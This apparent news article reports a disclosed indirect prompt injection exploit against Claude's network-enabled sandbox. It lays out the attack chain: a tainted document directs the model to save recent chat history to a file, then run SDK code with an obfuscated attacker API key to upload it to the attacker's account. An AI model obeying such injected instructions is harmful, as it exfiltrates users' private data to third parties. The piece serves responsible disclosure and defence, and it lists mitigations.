As AI systems become more powerful and interconnected, they increasingly become targets for cyberattacks. A recent discovery has revealed a critical security flaw in Anthropic’s Claude AI that allows hackers to exploit its newly added network capabilities to steal sensitive user data. By leveraging an indirect prompt injection method, attackers can extract private information such as chat histories and upload it to their own accounts.
This revelation, outlined in Johann Rehberger’s October 2025 blog post, sheds light on the growing risks as AI systems become more integrated with the external world. In this article, we’ll dive into how this vulnerability works, what it means for the security of AI models, and what steps can be taken to protect against such threats.
How Hackers Can Exploit Claude AI
The flaw in Claude AI lies in the system’s default setting, which permits network access to a list of approved domains including api.anthropic.com. This setting is primarily intended to allow Claude to install software packages securely from trusted sites like npm, PyPI, and GitHub. However, this whitelist inadvertently opens a backdoor for potential exploitation.
As detailed by Rehberger, an attacker can exploit this by embedding malicious prompts in files or user inputs, which can trick Claude AI into executing harmful actions. These actions include extracting sensitive data, such as recent chat histories, and uploading it to the attacker’s account using Claude’s network features.
Rehberger demonstrates the attack with a proof-of-concept, outlining a sophisticated chain of events that begins with indirect prompt injection. Here’s how it works:
The attacker embeds harmful instructions in a seemingly innocent file or document that the user submits to Claude for analysis.
With Claude’s recent “memory” feature, which allows the AI to recall past conversations, the malicious prompt instructs Claude to extract recent chat data and save it as a file. This file is then stored in the Code Interpreter’s sandbox, at a location such as /mnt/user-data/outputs/hello.md.
The next step involves forcing Claude to run Python code using the Anthropic SDK. The injected code sets an environment variable with the attacker’s API key, which allows the file to be uploaded to the attacker’s account via Claude’s Files API.
The key vulnerability here is that the upload targets the attacker’s account, bypassing normal authentication mechanisms. The attack succeeds on the first try, though Claude has since become more cautious about obvious API keys, requiring attackers to obfuscate them using benign code like simple print statements to evade detection.
AI Kill Chain and Data Exfiltration
Rehberger’s proof-of-concept includes a demo video and screenshots that illustrate the exploit in action. In the demo, an attacker views their empty console, while the victim processes a tainted document. Within moments, the stolen file appears in the attacker’s dashboard.
Notably, the exploit allows for multiple uploads, with each file potentially being as large as 30MB. This poses a significant threat, as attackers can exfiltrate large amounts of sensitive data. The “AI kill chain” could be expanded to other allow-listed domains, amplifying the risk to users.
Anthropic’s Initial Dismissal and Later Acknowledgment
Rehberger responsibly disclosed the vulnerability to Anthropic on October 25, 2025, through HackerOne. Initially, Anthropic dismissed the issue, calling it a “model safety issue” and claiming it was out of scope. However, after further investigation, the company acknowledged the vulnerability on October 30, 2025, citing a process error that led to the initial dismissal.
While Anthropic’s documentation already warns of the risks of data exfiltration from network egress, it highlights the need for users to carefully monitor sessions and halt any suspicious activity. The company’s eventual acknowledgment of the issue confirms the importance of securing AI models against potential exploitation, particularly as they gain greater external connectivity.
Security experts like Simon Willison have highlighted this exploit as part of the “lethal trifecta” of AI security risks: powerful AI models, external access, and prompt-based control. When these three elements converge, they create a perfect storm for attackers. As AI systems like Claude become more integrated into workflows, the attack surface increases, making them more susceptible to malicious use.
How to Protect Against AI Exploits
So, what can be done to protect against this kind of exploit? Several steps could help mitigate the risks:
- One obvious solution is to enforce sandbox rules that limit API calls to only the logged-in user’s account. By restricting what the AI can access, you can reduce the chances of an attack succeeding.
- Users should carefully consider when to enable network access and which domains to whitelist. Trusting default settings without review can create a false sense of security.
- Vigilant monitoring of AI sessions is key. If any suspicious activity is detected, it’s important to act quickly to shut down the system or revoke access.


Add a Comment